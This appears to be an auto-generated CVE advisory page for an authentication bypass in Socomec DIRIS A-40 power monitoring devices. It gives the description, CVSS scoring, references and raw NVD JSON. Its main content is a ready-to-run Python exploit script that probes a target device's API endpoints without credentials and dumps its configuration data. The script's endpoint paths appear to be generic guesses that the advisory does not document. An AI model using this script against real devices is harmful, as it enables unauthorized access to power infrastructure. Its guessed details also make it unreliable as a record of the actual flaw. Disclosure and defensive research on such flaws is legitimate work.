Security Vulnerability Report
CVE-2026-2491 CVSS 6.3 MEDIUM

CVE-2026-2491

Published: 2026-03-16 14:19:31
Last Modified: 2026-03-16 14:53:07

Description

Socomec DIRIS A-40 HTTP API Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Socomec DIRIS A-40 power monitoring devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web API implementation, which listens on TCP port 80 by default. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-23993.

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Socomec DIRIS A-40 (firmware version not specified)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-2491 PoC - Socomec DIRIS A-40 Authentication Bypass
# Target: Socomec DIRIS A-40 HTTP API (TCP Port 80)
# Attack Vector: Adjacent Network
# Authentication Required: None

import sys

import requests


def check_vulnerability(target_ip):
    """
    Check if target is vulnerable to CVE-2026-2491
    """
    base_url = f"http://{target_ip}"

    # Try to access API endpoints without authentication
    endpoints = [
        "/api/config",
        "/api/status",
        "/api/system",
        "/api/users",
        "/api/settings"
    ]

    print(f"[*] Testing CVE-2026-2491 on {target_ip}")
    print(f"[*] Target URL: {base_url}/api/")

    vulnerable = False
    for endpoint in endpoints:
        try:
            # Endpoints already carry the /api/ prefix, so join them to the host only
            url = base_url + endpoint
            response = requests.get(url, timeout=10)

            if response.status_code == 200:
                vulnerable = True
                print(f"[+] VULNERABLE: {endpoint} accessible without auth")
                print(f"    Status Code: {response.status_code}")
                print(f"    Response Length: {len(response.text)} bytes")
            elif response.status_code == 401:
                print(f"[-] Protected: {endpoint} requires auth")
            else:
                print(f"[*] Endpoint {endpoint} returned: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error connecting to {endpoint}: {e}")

    # True only if at least one endpoint answered 200 without credentials
    return vulnerable


def exploit_config_access(target_ip):
    """
    Exploit: Access sensitive configuration without authentication
    """
    config_url = f"http://{target_ip}/api/config"

    try:
        response = requests.get(config_url, timeout=10)
        if response.status_code == 200:
            print("[+] Successfully accessed configuration data")
            print("[+] Response:")
            print(response.text[:500])
            return response.json()
    except Exception as e:
        # Covers connection errors and non-JSON response bodies
        print(f"[!] Exploit failed: {e}")
    return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-2491.py <target_ip>")
        sys.exit(1)

    target = sys.argv[1]
    check_vulnerability(target)
    exploit_config_access(target)
```

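References

https://emea.socomec.com/en/resource-center/resource-type/cyber-vulnerabilities-601
https://www.zerodayinitiative.com/advisories/ZDI-26-129/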

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-2491", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:30.543", "lastModified": "2026-03-16T14:53:07.390", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Socomec DIRIS A-40 HTTP API Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Socomec DIRIS A-40 power monitoring devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the web API implementation, which listens on TCP port 80 by default. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-23993."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autenticación de la API HTTP de Socomec DIRIS A-40. Esta vulnerabilidad permite a atacantes adyacentes a la red omitir la autenticación en instalaciones afectadas de dispositivos de monitoreo de energía Socomec DIRIS A-40. La autenticación no es necesaria para explotar esta vulnerabilidad.\n\nLa falla específica existe dentro de la implementación de la API web, que escucha en el puerto TCP 80 por defecto. El problema resulta de la falta de autenticación antes de permitir el acceso a la funcionalidad. Un atacante puede aprovechar esta vulnerabilidad para omitir la autenticación en el sistema. Fue ZDI-CAN-23993."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://emea.socomec.com/en/resource-center/resource-type/cyber-vulnerabilities-601", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-129/", "source": "[email protected]"}]}}
```